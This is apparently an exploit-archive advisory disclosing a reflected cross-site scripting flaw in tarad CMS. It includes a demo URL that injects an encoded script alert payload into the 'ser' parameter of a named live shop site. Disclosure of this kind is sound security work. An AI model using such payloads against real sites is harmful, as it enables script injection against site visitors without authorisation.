tarad CMS - XSS Vulnerability

2020.10.04

Mostafa Farzaneh (IR)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

#Exploit Title:– tarad CMS XSS Vulnerability 
#Date: 2020-10-04
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: www.tarad.com
#Category: webapps
#Tested On: windows 10, Firefox
################################################################################

Cross Site Scripting (XSS)
Demo:http://www.nongmiu.com/product?lang=th&ser=%22/%3E%3Cscript%3Ealert(%22PywebSecurity%22)%3C/script%3E&cat=0

********************************************************* 
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

tarad CMS - XSS Vulnerability

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

tarad CMS - XSS Vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.